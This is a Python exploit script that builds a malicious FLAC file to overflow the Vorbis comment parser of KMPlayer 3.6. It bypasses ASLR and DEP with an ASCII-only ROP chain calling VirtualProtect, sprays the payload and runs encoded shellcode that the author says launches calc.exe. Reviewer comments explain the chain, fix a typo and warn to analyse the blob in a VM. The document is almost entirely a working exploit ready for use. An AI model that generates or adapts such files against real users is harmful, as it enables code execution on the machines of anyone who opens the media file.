from socket import *
import sys
import struct
import time
"""
Kmplayer 3.6 Buffer Overflow exploit
*Very* Low Reliablity :I
By sweetchip
"""
print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
print "[*] Author : sweetchip | 2013.04.18\n"
print "[*] Public Release Date : 2015.11.12"
filename = "Exploit_bypass_ASLR_DEP.flac"
# --- FLAC container framing --------------------------------------------------
# Head1 = "fLaC" stream marker, a STREAMINFO metadata block (header
# 00 00 00 22: not-last, type 0, 34-byte body) and then ONLY the type byte
# (0x04 = VORBIS_COMMENT) of the next block.  Its 24-bit length is supplied
# later, by the assembly section, as `payloadlen`.
_flac_marker = "fLaC"
_streaminfo_header = "\x00\x00\x00\x22"
_streaminfo_body = (
    "\x10\x00\x10\x00"                    # min / max block size
    "\x00\x0B\x3E\x00\x2E\x50"            # min / max frame size
    "\x0B\xB8\x02\xF0\x00\x91\x57\x93"    # sample rate, channels, bps, total samples
    "\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"    # 16-byte MD5 signature field
    "\x6B\x80\x38\x24\x7A\xBC\x64\x5A"
)
_vorbis_comment_type = "\x04"
Head1 = _flac_marker + _streaminfo_header + _streaminfo_body + _vorbis_comment_type

# head2: the low byte of `payloadlen` (always 0x00) plus the first three
# bytes here form vendor_length = 0 (LE32); then user_comment_list_length = 1.
head2 = "\x00\x00\x00" + "\x01\x00\x00\x00"

# EndofHead: 0x81 = last-metadata-block flag | type 1 (PADDING), with a
# 24-bit length of 0x00A446.  The zero tail appended at the end of the file
# serves as that block's body.
EndofHead = "\x81" + "\x00\xA4\x46"
# Stage-2 payload (446 bytes).  Per the author: a calc.exe launcher encoded
# with x86/alpha_mixed so that no byte is >= 0x80 -- the "ASCII only"
# constraint this exploit works under.  The first two bytes, \x54\x59
# (PUSH ESP / POP ECX), load the payload's own address into ECX; the ROP
# chain arranges for ESP to equal the shellcode address when execution
# falls through into it (PUSH ESP # RETN, then four INC ESP).  Presumably
# this is the encoder's BufferRegister=ECX convention -- not verifiable here.
# NOTE(review): the "calc" claim is the author's; nothing in this file
# verifies what the blob does.  Disassemble it before trusting it, and never
# open the generated .flac outside an isolated VM.
# cmd = calc
# encoder - x86/alpha_mixed
shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
"\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
"\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
"\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
"\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
"\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
"\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
"\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
"\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
"\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
"\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
"\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
"\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
"\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
"\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
"\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
"\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
"\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
"\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
"\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
"\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
"\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
"\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
"\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
"\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
"\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
"\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
"\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
"\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")
#############################################################################################################################################
##### ROP
##### special thanks to mona and corelan team
#############################################################################################################################################
# NOTE(review): this is the standard mona.py "PUSHAD" VirtualProtect chain,
# kept ASCII-safe (no byte >= 0x80 in any address or immediate).  How control
# first reaches it -- the POP ESP pivot in the ARTIST field and the 0x7d79xxxx
# pointers -- is not documented in this file.  Flow, assuming control arrives
# at the POP EAX gadget with ESP on its dword:
#   1. EAX = 0x11047e74 (an ASCII-safe base), then 4 x ADD EAX,0x10B0 and
#      336 x INC EAX.  Each ADD gadget ends in RETN 0x04, which skips the
#      following dword: that consumes the DEAD / BEEF / SWEE fillers and the
#      FIRST of the 337 INC copies, so 336 execute.
#      EAX = 0x11047e74 + 0x42C0 + 0x150 = 0x1104c284 (dword-aligned),
#      presumably the real, non-ASCII IAT slot of VirtualProtect in bass.dll.
#      Re-verify against the target binary before any reuse.
#   2. MOV EAX,[EAX]; XCHG EAX,ESI   -> ESI = VirtualProtect
#   3. POP EBP/EBX/EDX/ECX/EDI/EAX stage the PUSHAD frame:
#        EDI = RETN (rop nop), ESI = VirtualProtect,
#        EBP = PUSH ESP # RETN (where VirtualProtect returns to),
#        lpAddress = saved ESP, dwSize = EBX = 0x5050,
#        flNewProtect = EDX = 0x40 (PAGE_EXECUTE_READWRITE),
#        lpflOldProtect = ECX = 0x7d782020 ("writable" per the author).
#   4. PUSHAD # RETN -> RETN nop -> VirtualProtect -> PUSH ESP # RETN lands
#      on the 0x44444444 dword (4 x INC ESP, opcode 0x44) and falls through
#      into `shellcode`.
# All module addresses are for the exact PProcDLL.dll / bass.dll / bass_wv.dll
# builds bundled with KMPlayer 3.6 (as mona annotated them); 0x7d782020 is a
# build-specific constant the file does not explain.
rop_gadgets = ""
rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}  -- stack pivot; entry path not shown here
rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11047e74) # ASCII-safe base; +0x4410 below reaches the IAT slot (author's note: "ptr to &VirtualProtect() [IAT bass.dll]")
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "DEAD"                       # filler, skipped by the previous RETN 0x04
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "BEEF"                       # filler, skipped by the previous RETN 0x04
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "SWEE"                       # filler, skipped by the previous RETN 0x04
rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}  -- first copy skipped by the RETN 0x04 above, 336 run
rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]  -- EAX = VirtualProtect
rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]  -- ESI = VirtualProtect
rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}  -- EBP: return target after VirtualProtect
rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x00005050) # dwSize = 0x5050 -> ebx (the original note said 0x201; the packed value is 0x5050)
rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x00000040) # flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE) -> edx
rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x7d782020) # lpflOldProtect: writable location 7d782020 (per author; not verifiable here)
rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]  -- EDI, first thing returned into after PUSHAD
rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x44444444) # 0x44 = INC ESP x4; executed after PUSH ESP # RETN, then falls into the shellcode
rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
#############################################################################################################################################
# Stage 1 = filler + ROP chain + shellcode.  The 3028 "C"s fix the chain's
# offset inside each 64 KiB window that the ARTIST builder below sprays; the
# chain ends by falling straight through into `shellcode`.
stage1_parts = ("C" * 3028, rop_gadgets, shellcode)
stage1 = "".join(stage1_parts)
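# ------------------------------------------------------------------------------
# ARTIST= Vorbis comment that overflows the parser's buffer (author: "trigger a
# BOF / and will Execute shellcode").  The layout is the author's tuning for
# KMPlayer 3.6 and is reproduced unchanged; the only functional change is the
# undefined-name typo on the last line (`sartist`), which made the script die
# with NameError before ever writing the file.
# What 0x7d79192c / 0x7d791930 point to is not recorded here (the original
# note said "ptr to 7d761930", which does not match the packed value) --
# treat them as build-specific constants that must be re-derived for any
# other target.
# ------------------------------------------------------------------------------
STAGE1_STRIDE = 65536   # author's "#65536": one stage1 copy per 64 KiB window
STAGE1_COPIES = 7

artist = "ARTIST="
artist += "A" * 60000
artist += "A" * 4848
artist += struct.pack('<I', 0x7d79192c)
artist += "A" * 137
artist += struct.pack('<I', 0x10402f0f)   # POP ESP # RETN ** [bass_flac.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
artist += struct.pack('<I', 0x7d791930)   # new ESP after the pivot (see note above)
# "B" run sized so that everything after the first 60000 "A"s is exactly 140000 bytes.
artist += "B" * (140000 - 4848 - 4 - 4 - 4 - 137)
# Spray stage1 at fixed strides so the pivot has a reasonable chance of landing
# on the "C" run / ROP chain wherever the buffer ends up (hence "low reliability").
_stage1_window = stage1 + "Z" * (STAGE1_STRIDE - len(stage1))
artist += _stage1_window * STAGE1_COPIES
# Trailing filler.  The original read `sartist += "A" * 100000` (NameError);
# `artist` is the only plausible target.  Drop this line if the extra bytes
# turn out to change the crash behaviour on the target.
artist += "A" * 100000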
# ------------------------------------------------------------------------------
# Assemble the FLAC file:
#   Head1        "fLaC" + STREAMINFO block + the type byte (0x04) of the
#                VORBIS_COMMENT block
#   payloadlen   big-endian, shifted left 8 bits: its top three bytes become
#                the 24-bit block length and its low byte (0x00) starts the
#                little-endian vendor_length field that head2 completes
#   head2        rest of vendor_length (= 0) and user_comment_list_length (= 1)
#   artistlength / artist   the single comment, LE32 length-prefixed
#   EndofHead    0x81 = last-block flag | PADDING, declared length 0xA446
#   zero tail    body for that padding block (longer than declared)
# NOTE(review): the declared comment-block length also counts artistlength's
# 4 bytes and EndofHead, so it overshoots the bytes actually emitted for the
# block by three.  Left as the author had it -- the PoC was tuned against
# exactly this layout; whether the parser cares is not shown by this file.
# ------------------------------------------------------------------------------
artistlength = struct.pack('<I', len(artist))
comment_block_len = len(head2 + EndofHead + artistlength + artist)
payloadlen = struct.pack('>I', comment_block_len << 8)
exploit = "".join([
    Head1,
    payloadlen,
    head2,
    artistlength,
    artist,
    EndofHead,
    "\x00" * 118000,
])
print "\n[*] Generating Flac file....."
print "[ ] Payload size :", (len(exploit))
print "[ ] Shellcode size : \n"
f = open(filename,'w')
f.write(exploit)
f.close()
print "[*] Malicious File generated Successfully!!!"
print "[ ] file name : " + filename
raw_input("\npress enter to continue :D . . . . .")
#End OF Source.